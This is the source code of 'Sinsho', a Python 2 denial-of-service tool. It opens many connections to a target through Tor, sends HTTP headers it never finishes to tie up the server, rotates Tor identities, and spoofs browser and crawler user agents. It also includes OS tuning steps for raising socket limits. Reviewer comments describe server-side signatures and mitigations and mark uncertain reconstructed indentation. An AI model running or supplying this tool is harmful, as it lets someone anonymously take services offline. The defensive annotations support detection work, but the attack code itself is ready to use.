Sinsho is a proof-of-concept denial-of-service tool that takes advantage of vulnerabilities in the TCP/IP protocol. It is able to create many connections that are held in a TIME_WAIT or half-open state.
# NOTE(review): this listing was recovered from a whitespace-collapsed paste.
# Line breaks and indentation below are reconstructed; places where the
# nesting could not be determined with certainty are marked. The code is
# Python 2 (see the `except socket.error, e` clause further down).
#
# What the code does, as written: each worker thread opens connections to
# `target:port` through a local SOCKS5 proxy (`torPort`) and sends the start
# of an HTTP request whose header block is never terminated by a blank line.
# A separate thread sends SIGNAL NEWNYM to the local Tor control port every
# `torChange` seconds.
#
# Defender's view: the server-side signature is a large number of concurrent
# connections that each deliver a partial request header and then go quiet,
# with User-Agent values drawn from the fixed list below. Header-read
# timeouts (for example Apache mod_reqtimeout's RequestReadTimeout or nginx's
# client_header_timeout), caps on total and per-source concurrent
# connections, and a reverse proxy that only forwards complete requests
# bound the cost of each such connection.

### In order to use this script you will need to adjust values for
### max open file descriptors on your operating system.
### How this is done is dependent on your operating system.
### (These settings apply to the machine running the script.)
### Debian ###
### sysctl -w fs.file-max=1000000 ###
### ulimit -n 100000 ###
### /proc/sys/net/ipv4/
### tcp_retries1, tcp_retries2
### sysctl -w net.ipv4.tcp_retries1=1
### sysctl -w net.ipv4.tcp_retries2=1
### sysctl -w net.ipv4.tcp_fin_timeout=1

# HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TCPIP\Parameters
# TcpTimedWaitDelay - 300
# TcpMaxDataRetransmissions - 1
# TcpMaxConnectRetransmissions - 1
# InitialRttData - 65535

# Windows 7 SP1 - File Handle Quota
# HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows\
# USERProcessHandleQuota - 100000

import os, sys
import socket
import socks
import struct
import time
import random
from threading import *
import errno

##### GLOBALS #####
##### CHANGE THESE VALUE #####
target = "127.0.0.1" # Will not work against loopback - change this
port = 14569
connections = 200 # Connections per thread
threads = 100000 # Open File Descriptors/Sockets
torChange = 300 # Time between Tor IP Change in seconds
torPort = 9050
torControlPort = 9051 # Type in terminal "tor ControlPort 9051"
##################
### This is the thread sleep time
### Or iteration time between creating new threads
timeout = 1.0 # Edit if needed
##################

# Fixed pool of User-Agent strings; one is picked at random per connection in
# sinsho(). For log review: every value is a dated browser or crawler string,
# and the crawler entries (Googlebot, Yahoo! Slurp, YahooSeeker) will not
# match the address ranges those crawlers publish.
useragents = [
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)",
    "Googlebot/2.1 (http://www.googlebot.com/bot.html)",
    "Opera/9.20 (Windows NT 6.0; U; en)",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)",
    "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0",
    "Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16",
    "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)", # maybe not
    # NOTE(review): the collapsed source shows no comma after the next
    # literal, so it appears to be joined with the one that follows it into a
    # single value; a User-Agent header holding two browser strings back to
    # back would be a distinctive log signature. Confirm against the
    # original file, since the extent of the "maybe not" comment is inferred.
    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13"
    "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
    "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)",
    "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)",
    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8",
    "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
    "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
    "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)"
]

def log(message):
    """Print *message* to standard output."""
    print(message)

def newIdentity():
    """Send AUTHENTICATE and SIGNAL NEWNYM to the local Tor control port in a loop.

    Connects once to 127.0.0.1:torControlPort, then on every pass sends an
    AUTHENTICATE command with an empty password followed by SIGNAL NEWNYM,
    reads up to 1024 bytes of reply, and sleeps for torChange seconds.

    The reply is read but not inspected, so the "success" messages are logged
    whether or not the control port accepted the commands.

    Hardening note: a control port that accepts an empty password can be
    driven by any local process; Tor supports cookie and hashed-password
    authentication for this port.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
    sock.settimeout(None)  # blocking socket, no timeout
    sock.connect(("127.0.0.1", torControlPort))
    while True:
        try:
            sock.send('AUTHENTICATE \"\"\r\nSIGNAL NEWNYM\r\n')
            log("Tor Auth: success!")
            log("New identity requested")
            sock.recv(1024)
            log("Reply: from Tor")
        except socket.error, e:  # Python 2 exception syntax
            if isinstance(e.args, tuple):
                if e[0] == errno.EPIPE:
                    log("Broken Pipe: socket error %s" % e)
                else:
                    # determine and handle different error
                    log("Socket error %s" % e)
                    pass
            else:
                #log("Socket error %s" % e)
                pass
        # NOTE(review): placement inside the loop is inferred from the
        # collapsed source — confirm.
        time.sleep(torChange)
    # Follows an unconditional loop with no break in this reconstruction, so
    # it is not expected to be reached.
    return sock

def initTorCon(target, port):
    """Return a socket connected to (target, port) through the local SOCKS5 proxy.

    The proxy is 127.0.0.1:torPort; the socket is blocking with no timeout.
    `socks` here is the imported third-party module, not the local dict of
    the same name used inside sinsho().
    """
    sock = socks.socksocket()
    sock.setproxy(socks.PROXY_TYPE_SOCKS5, addr="127.0.0.1", port=torPort)
    sock.settimeout(None)
    sock.connect((target, port))
    return sock

def sinsho():
    """Worker loop: open `connections` proxied sockets and send a partial request on each.

    The data sent is a request line, a Host header and a User-Agent header
    with no trailing CRLF and no blank line, so the receiving server has not
    yet seen the end of the header block. This is the behaviour that
    server-side header-read timeouts are meant to bound.
    """
    # Local dict keyed by connection index; shadows the `socks` module inside
    # this function only.
    socks = {}
    while True:
        for i in range(connections):
            socks[i] = initTorCon(target, port)
            data = "GET / HTTP/1.1\r\n"
            data += "Host: %s\r\n" % (target)
            data += "User-Agent: %s" % (random.choice(useragents))
            # send() is called with MSG_OOB | MSG_DONTROUTE on the socket
            # returned by initTorCon().
            socks[i].send(data, socket.MSG_OOB | socket.MSG_DONTROUTE)
            log("[+] Packet data sent")

def main():
    """Start the control-port thread, then start `threads` worker threads.

    One thread runs newIdentity(); after that a sinsho() thread is started
    every `timeout` seconds until `threads` have been created, and each is
    then joined.
    """
    thread_array = []
    log("[+] Initiating Sinsho")
    log("[+] Target: %s" % target)
    log("[+] Port: %s" % port)
    log("[+] Starting Single Tor Thread")
    thread = Thread(target = newIdentity)
    thread.start()
    for i in range(threads):
        thread = Thread(target = sinsho)
        thread.start()
        thread_array.append(thread)
        time.sleep(timeout)  # pause between thread starts
    for thread in thread_array:
        thread.join()
        # NOTE(review): whether this sleep sits inside or after the join loop
        # cannot be told from the collapsed source — confirm.
        time.sleep(torChange)

if __name__ == '__main__':
    main()